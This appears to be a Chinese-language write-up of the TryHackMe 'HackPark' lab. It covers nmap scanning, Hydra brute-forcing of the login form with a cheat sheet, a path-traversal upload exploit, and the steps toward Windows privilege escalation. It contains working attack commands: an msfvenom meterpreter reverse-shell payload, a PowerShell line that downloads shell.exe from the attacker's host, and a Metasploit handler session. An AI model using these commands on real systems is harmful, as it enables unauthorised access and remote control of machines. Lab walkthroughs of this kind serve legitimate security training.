网络安全 TryHackMe WriteUp Offensive Pentesting Advanced Exploitation

【THM】HackPark-Practice

hihopkc2024-01-162024-01-16

使用 Hydra 暴力破解网站登录，识别并使用公共漏洞，然后提升您在这台 Windows 机器上的权限！

1	nmap -p- -sC -sV -T4 10.10.173.96

Nmap scan report for 10.10.173.96
Host is up (0.18s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: hackpark | hackpark amusements
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: HACKPARK
|   NetBIOS_Domain_Name: HACKPARK
|   NetBIOS_Computer_Name: HACKPARK
|   DNS_Domain_Name: hackpark
|   DNS_Computer_Name: hackpark
|   Product_Version: 6.3.9600
|_  System_Time: 2024-01-16T02:39:12+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2024-01-15T02:32:51
|_Not valid after:  2024-07-16T02:32:51
|_ssl-date: 2024-01-16T02:39:16+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Deploy the vulnerable Windows machine

Whats the name of the clown displayed on the homepage?

Reverse Image Search

pennywise

我们需要找到一个登录页面来攻击并确定表单向 Web 服务器发出的请求类型。通常，Web 服务器会发出两种类型的请求，一种是用于从 Web 服务器请求数据的 GET 请求，另一种是用于向服务器发送数据的 POST 请求。

您可以通过右键单击登录表单，检查元素，然后读取方法字段中的值来检查表单发出的请求。如果您通过 BurpSuite 拦截流量，您也可以识别这一点（可以在此处找到其他 HTTP 方法）。

现在我们知道了请求类型并有了登录表单的 URL，我们可以开始暴力破解帐户了。

hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'


hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.173.96 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=e0VQW1OyOsSO1Pdw9d07aVZqCjyBfmFBIb34zB7IhwXcWzQFbgUbJ0FOes5nGqVJUUvAOPV7Y%2B9JZO4NQEuOfkZjFMGMAn%2FvrFKmUmIsJ7a6xdi3Hm5n%2FahW0rtAlatHP8BQoriihsDJX5werhSd0PTWtH13w0xW5qHLS6uPq6WBzqMYx7yRmNR097yxiJxCPdaYp797EIbyAdZjBpZn5Xsdkw%2BI3Z7QtTAQt5OwZcySyWzFdbslAIS4EeVaCbohFKZaL2WdwOcQE2uf3%2FJmbtOslb0fOnFFRwFtIINjXRW2hDGw1pZgIXwFvb35nFNzf%2F15uNqVCcB2MFw0pIcercoZWl2JhvZzDBesA0EBxdLGyZCv&__EVENTVALIDATION=2CPNzhy6Cft1CPuLIxknkCdfc045nSfSR8%2FaDmqbjNq8qzSR%2Bqz5jcsv3G9XJzMj6ZDIXO6O2l8Q7j2EGgCETLa3Uaw%2BXEiHSr%2FeBgnBpTYcf0sIM576%2BHjlmUJxSWDekqGiuaanY6051zBx9jblKUqWF8LNswAHeBd7dqXzYVUDYpr6&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%BD%95:Login Failed" -vv

Below is a mini cheatsheet:

Command	Description
hydra -P -v	Brute force against a protocol of your choice
hydra -v -V -u -L -P -t 1 -u	You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)
hydra -t 1 -V -f -l -P rdp://	Attack a Windows Remote Desktop with a password list.
hydra -l -P . $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’	Craft a more specific request for Hydra to brute force.

Compromise the machine

https://www.exploit-db.com/exploits/46353

可以看到

http://10.10.173.96/admin/app/editor/editpost.cshtml

把他上传一下

10.10.173.96/?theme=../../App_Data/files

Windows Privilege Escalation

1	msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.63.201 LPORT=9001 -f exe > shell.exe

1	powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:80/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.11.63.201
lhost => 10.11.63.201
msf6 exploit(multi/handler) > set lport 9001
lport => 4445
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run